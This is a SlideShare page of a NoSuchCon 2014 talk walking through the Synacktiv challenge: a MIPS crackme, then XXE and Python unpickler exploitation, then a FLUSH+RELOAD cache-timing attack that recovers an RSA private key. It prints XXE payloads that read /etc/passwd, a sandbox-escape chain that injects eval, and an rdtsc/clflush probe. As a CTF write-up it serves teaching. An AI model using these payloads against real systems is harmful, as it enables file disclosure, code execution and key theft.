SlideShare uma empresa Scribd logo

NSC #2 - Challenge Solution

N
NoSuchCon

NSC #2 - Challenge Solution

Tecnologia
1 de 47
Baixar para ler offline
NSC#2 / Synacktiv challenge
Who am I ● Fabien Perigaud (@0xf4b) ● Reverse engineer at Airbus Defence and Space ● Challenges addict :)
NSC#2 challenge ● 3 parts – MIPS crackme – Web / Python exploitation – X64 / Crypto exploitation
MIPS crackme $ file crackmips crackmips: ELF 32-bit LSB executable, MIPS, MIPS-II version 1, dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=be26414a4b6e7af7098c07a6646a5c658e1440e7, not stripped ● Runs in Qemu ● MIPS Debian images available (Aurel32) root@debian-mipsel:~# ./crackmips usage: ./crackmips password root@debian-mipsel:~# ./crackmips test WRONG PASSWORD
In IDA ● Ugly big block ● Quite simple global behaviour
In IDA (2)
Parent: debug() ● Waits for a child break ● Get $pc value (ptrace(...)) ● Big block (again!) to compute new $pc ● Replace $pc in child's context => Operations on $pc independent from the password
Parent: debug() (2) ● Simple GDB script can recover all modified $pc values b *0x400B90 commands p/x $v0 cont end b *0x401D88 commands p/x $v0 cont end
Child: big ugly block ● Operates on DWORD of the password (loop on 6 DWORD) ● Can be divided in ~100 small blocks – Separated by “break 0” instructions ● Each small block is a simple operation – Only ~10 different ones (NOT/ADD/SUB/ROR/ROL/XOR with immediate values or a counter) – Pattern matching on instructions to transform big block in a set of basic operations
Big block transformation $ python transform.py extract_ida.txt [...] .text:00402290: SUB CNT .text:004022C0: ROR 1 .text:0040230C: SUB CNT .text:0040233C: XOR 0x7B4DE789 .text:00402370: ADD 0x87DD2BC5 .text:004023A4: ROR 12 .text:004023F0: ADD CNT .text:00402420: XOR CNT .text:00402450: ROL 13 .text:0040249C: NOT [...]
Putting all together ● New execution path + basic operations on password ● We can now invert the algorithm from the string "[ Synacktiv + NSC = <3 ]"
Part1 done $ python resolve_part1.py 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC # ./crackmips 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC good job! Next level is there: http://nsc2014.synacktiv.com:65480/oob4giekee4zaeW9/
Web Exploitation
Web exploitation (2) ● Try to post a message POST /msg.add HTTP/1.1 Host: nsc2014.synacktiv.com:65480 [...] vs=&title=TITLE_TEST&body=<msg>MSG_TEST</msg> => Smells like XML ! XXE anyone ?
XXE ! ● Let's try … POST /msg.add HTTP/1.1 Host: nsc2014.synacktiv.com:65480 [...] vs=&title=TITLE_TEST&body=<!DOCTYPE foo [<!ENTITY z SYSTEM "file:///etc/passwd">]><msg>&z;</msg>
XXE ! (2) ● Dir listing ? POST /msg.add HTTP/1.1 Host: nsc2014.synacktiv.com:65480 [...] vs=&title=TITLE_TEST&body=<!DOCTYPE foo [<!ENTITY z SYSTEM "file:///">]><msg>&z;</msg>
XXE ! (3) ● Just retrieve the two files $ cat app.conf [global] you_know_how_to_play_with_xxe = 1 admin_url = /secret.key [viewstate] key = ab2f8913c6fde13596c09743a802ff7a $ file viewstate.pyc viewstate.pyc: python 2.7 byte-compiled
/secret.key ? ● viewstate.pyc → uncompyle2 → viewstate.py ● Code responsible for the /secret.key request ADMIN_HOSTS = frozenset(['127.0.0.1', '::1', '10.0.1.200']) @staticmethod def getMasterSecretKey(req, vs_data = None): assert isinstance(req, EZWebRequest) vs = App._load_session(vs_data) if vs.data.get('uid', -1) != 31337: raise SecurityError('not allowed from this uid') if req.env['REMOTE_ADDR'] not in App.ADMIN_HOSTS: raise SecurityError('not allowed from this IP address') return (vs, SecretStore.getMasterKey())
vs ● Serialized dictionary → compressed (zlib) → ciphered (AES) → encoded (base64) ● Key provided by app.conf ● Unserialization done by a custom Unpickler (restricted __reduce__() functions list) SAFE_BUILTINS = frozenset(['bool', 'chr', 'dict', 'float', 'getattr', 'int', 'list', 'locals', 'long', 'max', 'min', 'repr', 'set', 'setattr', 'str', 'sum', 'tuple', 'type', 'unicode'])
Python exploitation ● Goal: add eval to the SAFE_BUILTINS set ● Steps: – Create new set → we've access to set() – Retrieve “self” → next slide :) – setattr(self, “SAFE_BUILTINS”, new_set) → we've access to setattr() – PROFIT §§§ → next next slide
Python exploitation (2) ● locals() returns a dict containing “self” ● getattr() does not allow to retrieve a dict element ● type(“x”, (), mydict) allows to create a new object with mydict as __dict__ ● “self” retrieved with : getattr(type("obj42", (), locals()), "self")
Python exploitation (3) ● Secret key should be in the getMasterKey() function constants eval(__import__('viewstate').SecretStore.getMas terKey.func_code.co_consts) ● Final vs vs = {'msg': [{'body': SETATTR(), 'title': EVAL()}], 'display_name': 'guest'}
Part2 done … "messages": [{"body": null, "title": [null, 124, "getMasterKey() caller not authorized (opcode %i/%i)", "viewstate.py", "getMasterKey() caller not authorized", "getMasterSecretKey", "getMasterKey() caller not authorized (function %s/%s)", "master_key=http://nsc2014.synacktiv.com:65480/OhXieK1hEiza hk2i/securedrop.tar.gz"]} ...
SecureDrop $ tar tvzf securedrop.tar.gz ● drwxr-xr-x efiliol/ANSSI 0 2014-09-01 17:06 securedrop/ ● drwxr-xr-x efiliol/ANSSI 0 2014-09-01 17:06 securedrop/client/ ● -rw-r--r-- efiliol/ANSSI 2002 2014-08-28 12:23 securedrop/client/client.py ● drwxr-xr-x efiliol/ANSSI 0 2014-09-01 17:06 securedrop/archive/ ● -rw-r--r-- efiliol/ANSSI 803 2014-09-01 17:06 securedrop/archive/messages ● drwxr-xr-x efiliol/ANSSI 0 2014-08-27 19:06 securedrop/servers/ ● -rwxr-xr-x efiliol/ANSSI 9600 2014-08-27 18:43 securedrop/servers/SecDrop ● drwxr-xr-x efiliol/ANSSI 0 2014-08-27 14:34 securedrop/servers/xinetd.conf/ ● -rw-r--r-- efiliol/ANSSI 466 2014-08-27 14:34 securedrop/servers/xinetd.conf/secdrop ● -rw-r--r-- efiliol/ANSSI 449 2014-08-27 14:34 securedrop/servers/xinetd.conf/stpm ● -rwxr-xr-x efiliol/ANSSI 14728 2014-08-27 18:43 securedrop/servers/STPM ● drwxr-xr-x efiliol/ANSSI 0 2014-08-27 14:35 securedrop/lib/ ● -rwxr-xr-x efiliol/ANSSI 35648 2014-08-27 18:43 securedrop/lib/libsec.so
Global architecture client.py SecDrop STPM Client side Server side
Client.py ● Asks a message ● Generates random AES key ● Ciphers message (AES) ● Ciphers AES key (RSA) ● Send ciphered message + ciphered key (+ a constant password to authenticate with the service): separation with a 'n'
SecDrop ● Handles client.py connections / requests ● Asks STPM to decrypt the message ● If decryption is correct, save the ciphered message/key to “messages” file
STPM ● Stores secret keys (AES / RSA) – Can import new keys ● Handles 4 commands : – import_key – export_key – print_keys – message_decrypt
libsec.so ● Loaded by both SecDrop and STPM ● Various cryptographic functions : – AES-OCB3 (encrypt/decrypt messages): SEC_crypt(), SEC_decrypt() – RSA (import/export AES key): key_wrap(), key_unwrap() ● Printing functions: SEC_fprintf(), SEC_fprintf_keys(), SEC_fgetc()
And now ? ● Goal is to decrypt “messages” file ● Need to get RSA private key OR decrypted AES key ● Let's have a look at SecDrop
SecDrop Vulnerability ● Trivial stack buffer overflow in client messages handling ● Seccomp with custom rules (only access to read(), write() and exit()) ● No NX on this binary (took me a few days …) ● Performed some ROP to put an arbitrary shellcode in a known location and jmp on it – Didn't see the “jmp rsp” in the code … ● Now what ?
Now what ? client.py SecDrop STPM Client side Server side We're here
Now what ? ● Try to call the list_keys() function in STPM ● Returns: – AES key: k = SECRET :) – RSA key: q = PRIVATE :) ● Function only allows printing public part of the RSA key :( 21:17 <Baboon> :D 21:17 <Baboon> tu croyais quoi 21:18 <Baboon> tu vas en chier :P
Now hints ! ● Spent some days trying to find a “classical” vulnerability in STPM… ● Hints published by Synacktiv
Hints decoding ● “RDTSC”: timing attack ● “Attack the cache”: timing attack on the CPU cache ● Looking for papers … – “FLUSH+RELOAD: a High Resolution, Low Noise, L3 Cache Side-Channel Attack” → attack on CPU cache to retrieve a RSA key when a naive implementation is used
Attack! ● Determine the execution path taken by the process ● We'll attack the square and multiply accum = 1; i = 0; bpow2 = m while ((d>>i)>0): if((d>>i) & 1): accum = (accum*bpow2) % n # multiply bpow2 = (bpow2*bpow2) % n # square i+=1 return accum This part is taken if the current bit is 1
Processor cache ● CPU wants to execute code at address X – Check if data is in cache – If not, load it from memory then cache it ● Is data in cache? – Just measure the time taken to access it! ● From another process?? – Yes! Shared pages FTW
Shared pages SecDrop STPM Physical memory libsec.so - Both processes access the same memory page - If STPM executes address X, the data is put in cache - If SecDrop then accesses address X, it will be retrieved from the cache
Attack! (2) ● How to know if code at @X has been executed by STPM ? – Measure time to access @X form SecDrop ● Slow → not in cache → not executed ● Fast → in cache → has been executed ! – Flush the cache! – Sleep ; goto start ; ● Allows to know when a specific part of the code has been executed across time – Reveals bits of the key!
Attack! (3) ● Empirically determine two values: – Sleep time between measures – Threshold to determine if data is in cache ● Final exploit: – Ask decryption of key – Do N measures (one measure stored on 1 bit) – Retrieve measures
Measurement example probe: mfence lfence rdtsc mov esi, eax mov eax, DWORD [rdi] lfence rdtsc sub eax, esi mov esi, eax xor rax, rax clflush [rdi] cmp esi, 0xc0 jge probend mov rax, 1 probend: retn
Retrieve the key from the bits ● Some statistical analysis and black magic – Assume square() and multiply() take the same amount of time – X 1's followed by X 0's → bit 1 – X 0's only not preceded by 1's → bit 0 ● We can see the bits in an hexdump!
GET THE KEY §§§ 1 11 00 000
Avoid measurement errors ● Repeat the operation 100 times ● Take the best candidate – One key is found 70 times on 100 – Other ones only differ by a few bits… exploit in not perfect :) ● Final key found is 1374 bits – And does not work to decrypt the AES key :(
Lack of bits ● We may have failed getting some bits ? – N modulus is 1380 bits ● Bruteforce at most 6 bits of the key ! – Good key found in seconds
Final run ● Decrypt AES key contained in “messages” file using the retrieved key ● Decrypt the message using AES key $ python final_p3.py Good job! Send the secret 3fcba5e1dbb21b86c31c8ae490819ab6 to 82d6e1a04a8ca30082e81ad27dec7cb4@synacktiv.com. Also, don't forget to send us your solution within 10 days. Synacktiv team
Thanks ! ● For your attention ● To NSC staff for this presentation ● To Synacktiv for their crazy challenge

Recomendados

OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
Hacking the Gateways
Hacking the GatewaysHacking the Gateways
Hacking the GatewaysOnur Alanbel
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]RootedCON
 
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...RootedCON
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
 
How to Root 10 Million Phones with One Exploit
How to Root 10 Million Phones with One ExploitHow to Root 10 Million Phones with One Exploit
How to Root 10 Million Phones with One ExploitJiahong Fang
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
 
[CB16] The ARMs race for kernel protection by Jonathan Levin
[CB16] The ARMs race for kernel protection by Jonathan Levin[CB16] The ARMs race for kernel protection by Jonathan Levin
[CB16] The ARMs race for kernel protection by Jonathan LevinCODE BLUE
 

Recomendados

OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
Hacking the Gateways
Hacking the GatewaysHacking the Gateways
Hacking the GatewaysOnur Alanbel
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]RootedCON
 
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...RootedCON
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
 
How to Root 10 Million Phones with One Exploit
How to Root 10 Million Phones with One ExploitHow to Root 10 Million Phones with One Exploit
How to Root 10 Million Phones with One ExploitJiahong Fang
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
 
[CB16] The ARMs race for kernel protection by Jonathan Levin
[CB16] The ARMs race for kernel protection by Jonathan Levin[CB16] The ARMs race for kernel protection by Jonathan Levin
[CB16] The ARMs race for kernel protection by Jonathan LevinCODE BLUE
 
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisIstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisBGA Cyber Security
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - RoutersLogicaltrust pl
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...RootedCON
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
Automated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceAutomated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceJason Choi
 
OWASP Much ado about randomness
OWASP Much ado about randomnessOWASP Much ado about randomness
OWASP Much ado about randomnessAleksandr Yampolskiy
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) ShenPROIDEA
 
Масштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromeМасштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromePositive Hack Days
 
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...PROIDEA
 
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Positive Hack Days
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRootedCON
 
Эксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAPЭксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAPPositive Hack Days
 
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...RootedCON
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
Python Cryptography & Security
Python Cryptography & SecurityPython Cryptography & Security
Python Cryptography & SecurityJose Manuel Ortega Candel
 
Secure coding for developers
Secure coding for developersSecure coding for developers
Secure coding for developerssluge
 
Memory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMMMemory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMMPositive Hack Days
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)Javier Junquera
 
Introduction httpClient on Java11 / Java11時代のHTTPアクセス再入門
Introduction httpClient on Java11 / Java11時代のHTTPアクセス再入門Introduction httpClient on Java11 / Java11時代のHTTPアクセス再入門
Introduction httpClient on Java11 / Java11時代のHTTPアクセス再入門tamtam180
 
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNoSuchCon
 
NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NSC #2 - D2 06 - Richard Johnson - SAGEly AdviceNSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NSC #2 - D2 06 - Richard Johnson - SAGEly AdviceNoSuchCon
 

Mais conteúdo relacionado

Mais procurados

IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisIstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisBGA Cyber Security
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - RoutersLogicaltrust pl
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...RootedCON
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
Automated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceAutomated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceJason Choi
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) ShenPROIDEA
 
Масштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromeМасштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromePositive Hack Days
 
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...PROIDEA
 
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Positive Hack Days
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRootedCON
 
Эксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAPЭксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAPPositive Hack Days
 
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...RootedCON
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
Secure coding for developers
Secure coding for developersSecure coding for developers
Secure coding for developerssluge
 
Memory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMMMemory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMMPositive Hack Days
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)Javier Junquera
 
Introduction httpClient on Java11 / Java11時代のHTTPアクセス再入門
Introduction httpClient on Java11 / Java11時代のHTTPアクセス再入門Introduction httpClient on Java11 / Java11時代のHTTPアクセス再入門
Introduction httpClient on Java11 / Java11時代のHTTPアクセス再入門tamtam180
 

Mais procurados (20)

IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisIstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]
 
Automated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceAutomated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security Intelligence
 
OWASP Much ado about randomness
OWASP Much ado about randomnessOWASP Much ado about randomness
OWASP Much ado about randomness
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
 
Масштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromeМасштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google Chrome
 
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...
CONFidence 2018: Darknet traffic - what can we learn from nooks and crannies ...
 
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Эксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAPЭксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAP
 
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack aws
 
Python Cryptography & Security
Python Cryptography & SecurityPython Cryptography & Security
Python Cryptography & Security
 
Secure coding for developers
Secure coding for developersSecure coding for developers
Secure coding for developers
 
Memory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMMMemory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMM
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)
 
Introduction httpClient on Java11 / Java11時代のHTTPアクセス再入門
Introduction httpClient on Java11 / Java11時代のHTTPアクセス再入門Introduction httpClient on Java11 / Java11時代のHTTPアクセス再入門
Introduction httpClient on Java11 / Java11時代のHTTPアクセス再入門
 

Destaque

NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNoSuchCon
 
NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NSC #2 - D2 06 - Richard Johnson - SAGEly AdviceNSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NSC #2 - D2 06 - Richard Johnson - SAGEly AdviceNoSuchCon
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNoSuchCon
 
NSC #2 - Challenge Introduction
NSC #2 - Challenge IntroductionNSC #2 - Challenge Introduction
NSC #2 - Challenge IntroductionNoSuchCon
 
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch ProtectionsNSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch ProtectionsNoSuchCon
 
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLCNSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLCNoSuchCon
 
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacksNSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacksNoSuchCon
 
NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
NSC #2 - D1 02 - Georgi Geshev - Your Q is my QNSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
NSC #2 - D1 02 - Georgi Geshev - Your Q is my QNoSuchCon
 
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based deviceNSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based deviceNoSuchCon
 
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineeringNSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
